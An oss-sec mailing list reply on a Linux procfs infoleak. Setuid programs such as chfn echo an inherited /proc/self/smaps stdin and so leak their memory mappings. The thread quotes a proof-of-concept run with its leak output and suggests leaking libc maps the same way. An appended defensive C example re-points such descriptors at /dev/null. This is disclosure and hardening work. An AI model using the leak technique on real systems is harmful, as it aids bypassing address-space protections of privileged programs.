oss-sec mailing list archives

Re: Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access)


From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Thu, 9 Feb 2012 03:28:16 +0100

On Thu, Feb 9, 2012 at 00:03, Djalal Harouni <tixxdz () opendz org> wrote:

BTW lseek() on seq files will only succeed on /proc/self/ files.

chsh, which is setuid on most distros, will read stdin and print
errors to stderr; this is why it can be used as a target program. I did
not search, but if there is another program then it may be our 'winner'.

This issue is actually somewhat similar to the /proc/pid/mem issue a
few weeks ago. Seems like Linus' logic from this commit [1] should be
applied to the rest of proc.



$ for i in $(seq 460 480); \
 do ./procfs_leak_2 /usr/bin/chfn /proc/self/smaps $i; done
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: Changing the user information for tixxdz
Enter the new value, or press ENTER for the default
       Full Name: tixxdz
               Room Number [er]:       Work Phone []:  Home Phone []:
               chfn: invalid room number: '00608000-0060a000 rw-p
               00008000 08:01 218841
               /usr/bin/chfn'
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed


This was tested on Ubuntu, Debian default setuid 'chfn'.


Awesome! Nice work.

You can do this to leak maps of libc... since the lseek() on /proc/self
will pass the ptrace_may_access() check.


Solar, as I've said above, I believe that there is a complicated problem
about these files. Should I discuss them here or just finish my patches
and try to discuss them on lkml?


Let me know if you move it to LKML -- I'm curious to see how this pans out.


Thanks.

Alexander



[1] http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=e268337dfe26dfc7efd422a804dbb27977a3cccc
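The thread's point is that a setuid program such as chfn/chsh reads an inherited stdin and echoes rejected input to stderr, so a descriptor that the unprivileged parent opened on a /proc/self/ seq file becomes a read channel into the privileged process's own mappings. The remedy discussed above is kernel-side (applying the /proc/pid/mem open-time check to the rest of proc). As a defence-in-depth check on the userspace side, the following added example (written for this page, not code from the thread or from any of its participants) shows how a privileged helper can verify at startup that its standard descriptors are not procfs-backed and re-point any that are, or that are closed, at /dev/null. It assumes Linux, glibc's fstatfs(), and PROC_SUPER_MAGIC from <linux/magic.h>; the function names fd_is_procfs() and sanitize_std_fds() are hypothetical.

```c
/* Added example: startup check for a privileged program that must not
 * treat inherited fds 0..2 as trustworthy. Not part of the oss-sec thread.
 * Assumes Linux + glibc; PROC_SUPER_MAGIC comes from <linux/magic.h>. */
#include <fcntl.h>
#include <linux/magic.h>
#include <stdio.h>
#include <sys/vfs.h>
#include <unistd.h>

/* Return 1 if fd is open on a procfs file, 0 if it is open elsewhere,
 * -1 if fd is not an open descriptor (fstatfs fails with EBADF). */
int fd_is_procfs(int fd)
{
    struct statfs sfs;
    if (fstatfs(fd, &sfs) != 0)
        return -1;
    return sfs.f_type == PROC_SUPER_MAGIC ? 1 : 0;
}

/* Re-point one descriptor at /dev/null with the given open flags.
 * Returns 0 on success, -1 on error. */
static int redirect_to_devnull(int fd, int flags)
{
    int nullfd = open("/dev/null", flags);
    if (nullfd < 0)
        return -1;
    if (nullfd != fd) {            /* nullfd == fd happens when fd was closed */
        if (dup2(nullfd, fd) < 0) {
            close(nullfd);
            return -1;
        }
        close(nullfd);
    }
    return 0;
}

/* Sanitize fds 0..2: any that is closed or backed by procfs is replaced
 * with /dev/null. Returns how many descriptors were replaced, or -1. */
int sanitize_std_fds(void)
{
    int replaced = 0;
    for (int fd = STDIN_FILENO; fd <= STDERR_FILENO; fd++) {
        int r = fd_is_procfs(fd);
        if (r == 0)
            continue;              /* ordinary file, tty, pipe: keep it */
        int flags = (fd == STDIN_FILENO) ? O_RDONLY : O_WRONLY;
        if (redirect_to_devnull(fd, flags) < 0)
            return -1;
        replaced++;
    }
    return replaced;
}

int main(void)
{
    int n = sanitize_std_fds();
    if (n < 0) {
        perror("sanitize_std_fds");
        return 1;
    }
    fprintf(stderr, "replaced %d standard descriptor(s)\n", n);
    /* A real privileged program would only now start reading stdin. */
    return 0;
}
```

Running it as `./sanitize < /proc/self/maps` reports one replaced descriptor, while `./sanitize < /etc/hostname` reports zero. The check is deliberately coarse: it looks at the filesystem behind the descriptor rather than at the path, so it also catches a procfs file that was renamed or bind-mounted into view, and it treats a closed standard descriptor the same way so that a later open() in the program cannot silently land on fd 0, 1 or 2.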

